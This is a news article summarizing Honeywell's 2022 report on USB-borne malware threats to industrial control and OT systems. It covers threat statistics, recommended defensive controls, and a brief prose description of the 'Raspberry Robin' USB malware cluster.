USB removable media threats continue as serious concern, as ICS increasingly under attack from hackers

Honeywell revealed that 52 percent of threats were specifically designed to utilize removable media, up from 37 percent the previous year. It has more than doubled from the 19 percent recorded in the 2020 study, indicating that the threats designed to use USB removable media have reached a dangerously high level. Additionally, threats designed to establish remote access capabilities remained steady at 51 percent, remaining consistent with the 2021 level, though the threat level remains high.

“Of the threats seen, Trojans still dominated, once again comprising 76% of the malware detected,” the Honeywell report, titled ‘Industrial Cybersecurity: USB Threat Report 2022,’ said on Tuesday. “This solidifies our suspicion that adversaries are deliberately leveraging USB removable media as an initial attack vector, at which point they will attempt to establish remote connectivity to download additional payloads, exfiltrate data, and establish command and control.” 

Combined with a corresponding increase in threats targeting industrial from 30 percent to 32 percent, this again validates the theory that USB removable media are being used to penetrate the air-gapped environments found in many industrial/OT environments, the report said. Eighty-one percent of threats are capable of disrupting OT (operational technology) systems, the underlying technology used to control industrial environments, up from 79 percent in last year’s report.

“This year’s report indicates that adversaries are deliberately leveraging removable media as an initial attack vector to establish remote connectivity, exfiltrate data, and establish command and control,” Jeff Zindel, vice president and general manager, Honeywell Connected Enterprise Cybersecurity, said in a press statement. “It’s now painfully clear that USB removable media are being used to penetrate industrial/OT environments, and that organizations must adopt formal programs to defend against this type of threat to avoid costly disruptions.”

Now in its fourth year, the Honeywell report identified that the threats seen attempting to enter industrial/OT environments have continued to increase in sophistication, frequency, and in their potential risk to operations. USB-borne malware is clearly being leveraged as part of larger cyber attack campaigns against industrial targets. Adaptations have occurred to take advantage of leveraging the ability of USB removable media to circumvent network defenses and bypass the air gaps upon which many of these facilities depend for protection. Continued diligence is necessary to defend against the growing USB threat, and strong USB security controls are highly recommended.

In its report last year, Honeywell said that the global pandemic influenced how most OT organizations functioned day-to-day to accommodate new health and safety guidelines. Attempts to minimize the physical proximity of staff where possible led to an increased need for the movement of digital data. As a result, the two primary communication paths into OT – removable media and network connectivity – were under increased strain, and operators faced new operational challenges as a consequence, it added.

The Honeywell Industrial Cybersecurity USB Threat Report shows a clear trend toward cybersecurity threats becoming more prominent and potent. While the report is based on aggregated data from Honeywell SMX and is fully anonymized, the findings represent consolidated views into the collective data set, and sample set findings are interpreted in light of the impact on the more extensive sample set. Additionally, Honeywell SMX analyzes USB devices as they are actively used in industrial facilities, providing a highly focused view of industrial USB activity.

Industries represented include critical infrastructure sectors defined by the U.S.  Cybersecurity and Infrastructure Security Agency (CISA). The findings are limited to malware that has been detected and blocked. As no malware detection technology is 100 percent effective, it is, therefore, possible that additional threats were not detected and, as a result, not included in the Honeywell report.

Honeywell said its findings do not prove a concerted intention to bypass air gaps in industrial systems, though it highlights an increased capability to do so. “In addition, looking at the malware samples validated another trend that first surfaced last year. The number of threats designed specifically to target industrial control systems also increased slightly year over year, up from 30% to 32%, while at the same time, the malware was more capable of causing a disruption to industrial control systems, up from 79% to 81%,” the report added.

Industrial operators must establish a clear USB security policy. Evidence indicates USB removable media is intentionally used as an initial attack vector in industrial control/OT environments. As such, technical controls and enforcement must be established to better secure USB media and peripherals.

The report also pointed to evidence that continues to indicate new threat variants are being introduced more quickly, specifically via USB, and specifically targeting the industrial sector. “To this end, existing controls should be re-examined, and patch cycles should be re-evaluated in an attempt to close the MTTR. External controls to provide real-time detection and protection of key systems should be considered, as well as integrated monitoring and incident response procedures,” it added.

The Honeywell report calls for additional scrutiny to be placed on files, documents, and other digital content. Inspection and detection-based controls are necessary for the primary vectors into and between protected industrial facilities such as removable media and network connections to improve their ability to prevent the introduction and propagation of content-based malware.

Furthermore, outbound network connectivity from process control networks must be tightly controlled and enforced by network switches, routers, and firewalls. Threats crossing the air gap via USB are used to establish a toe hold into industrial systems, backdoors, and remote access to install additional payloads and establish remote command-and-control. 

Organizations must also carry about security upkeep, such as anti-virus software deployed in process control facilities needs to be updated daily. Even then, a layered approach to threat detection that includes OT-specific threat intelligence is strongly recommended for maximum efficacy. 

Due to the large percentage of threats encountered in OT environments that evade detection by traditional anti-malware software, anti-malware controls must be kept current to be effective. Additionally, patching and hardening end nodes are necessary due to the extent of threats capable of establishing persistence and covert remote access to otherwise air-gapped systems. Therefore, the hardening of OT systems is also a key contribution to improving incident MTTR.

In May, Red Canary Intelligence reported tracking a cluster of malicious activity that it calls ‘Raspberry Robin’ and observed to target organizations with ties to technology and manufacturing, though it’s not yet clear if there are other links among victims. Initially observed last September, the Raspberry Robin cluster of activity is often installed via USB drive. The activity cluster relies on ‘msiexec[dot]exe’ to call out to its infrastructure, often compromised QNAP devices, using HTTP requests that contain a victim’s user and device names.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.